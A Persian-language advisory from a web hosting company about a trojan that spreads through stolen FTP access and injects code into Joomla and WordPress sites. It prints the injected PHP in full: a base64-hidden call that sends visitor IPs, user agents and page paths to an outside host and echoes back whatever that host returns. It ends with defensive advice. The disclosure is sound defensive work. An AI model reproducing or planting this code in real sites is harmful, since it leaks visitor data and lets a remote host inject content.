منوی اصلی

کشف ویروس تروجان بسیار قوی که باعث آلوده شدن سایت می شود

ویروس تروجان بسیار قوی به تازگی در حال آلوده کردن بسیاری از وب سایت ها می باشد.
این ویروس که توسط پرسنل پارس میزبان شناسایی و رد یابی کامل شد ، توسط دستیابی به FTP یک سایت از روی کامپیوتر آلوده ، شروع به آلوده کردن هوشمندانه کد های یک وب سایت می کند.
این ویروس با ویرایش فایل های متداول یک هاست از جمله سایت های Joomla ، WordPress ، Mambo و غیره کد خاصی را درج کرده و شروع به ارسال اطلاعات از این سایت ها می کند و پهنای باند وب سایت را مصرف می کند.

نمونه فایل های آلوده شده بر روی یک هاست :

همانطور که ملاحظه می کنید این دستیابی از طریق IP ی در آمریکا در دیتا سنتر SoftLayer انجام شده است. (http://whois.domaintools.com/173.192.88.18)
بر اساس گزارش ما ارتباط با FTP ممکن است از IP های مختلفی ایجاد شود.

این ویروس ، قطعه کد زیر را در فایل های نام برده قرار می دهد:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

این کد اطلاعات بازدید سایت را برای آدرسی که در قسمت base64_decode به صورت Encode شده ، ذکر شده ارسال می کند. http://browserglobalstat.com/statD/stat.php

چگونه از این ویروس در امان باشیم ؟

– استفاده از آنتی ویروس آپدیت شده (هر چند تا به حال هیچ آنتی ویروسی این ویروس را شناسایی نکرده ! در حال گزارش هستیم !)
– عدم استفاده از نرم افزار های FTP غیر معتبر ، تا حد امکان عدم استفاده از FTP و استفاده از File Manager های موجود بر روی کنترل پنل هاست و آپلود دسته ای توسط ZIP
– استفاده از کلمات عبور پیچیده
– نگهداری مناسب از حساب کاربری ایمیل و تغییر کلمه عبور ایمیل

لطفا جهت جلوگیری از پخش این ویروس به دوستان خود نیز اطلاع دهید!

هیچ برچسبی برای این مطلب وجود ندارد

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

logo-samandehi
پرداخت توسط شرکت به پرداخت ملت

کلیه حقوق © این وب سایت متعلق به شرکت مهندسین مبتکران پارس میزبان می باشد.